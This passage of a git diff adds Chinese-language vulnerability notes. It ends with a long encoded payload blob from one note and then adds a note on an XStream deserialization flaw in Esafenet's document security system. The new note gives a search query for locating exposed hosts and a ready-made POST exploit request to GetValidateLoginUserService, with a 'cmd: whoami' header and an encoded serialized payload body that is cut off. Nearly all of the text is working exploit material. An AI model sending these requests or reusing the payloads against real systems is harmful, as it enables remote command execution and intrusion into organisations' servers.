AABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1706605863707-aef6e36b-ee6e-4f38-b0c7-43f83ed94ff0.png](./img/EYAPtwuYcTJTY55y/1706605863707-aef6e36b-ee6e-4f38-b0c7-43f83ed94ff0-597134.png)
+
+
+
+> 更新: 2024-04-20 22:01:32  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/twt6gduy9570dygc>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..adb8d18
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream反序列化漏洞.md
@@ -0,0 +1,38 @@
+# 亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetValidateLoginUserService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Uxwzn6Zr9xGruQMB/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-297779.png)
+
+# 四、漏洞复现
+```java
+POST /CDGServer3/GetValidateLoginUserService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: {hostname}
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCO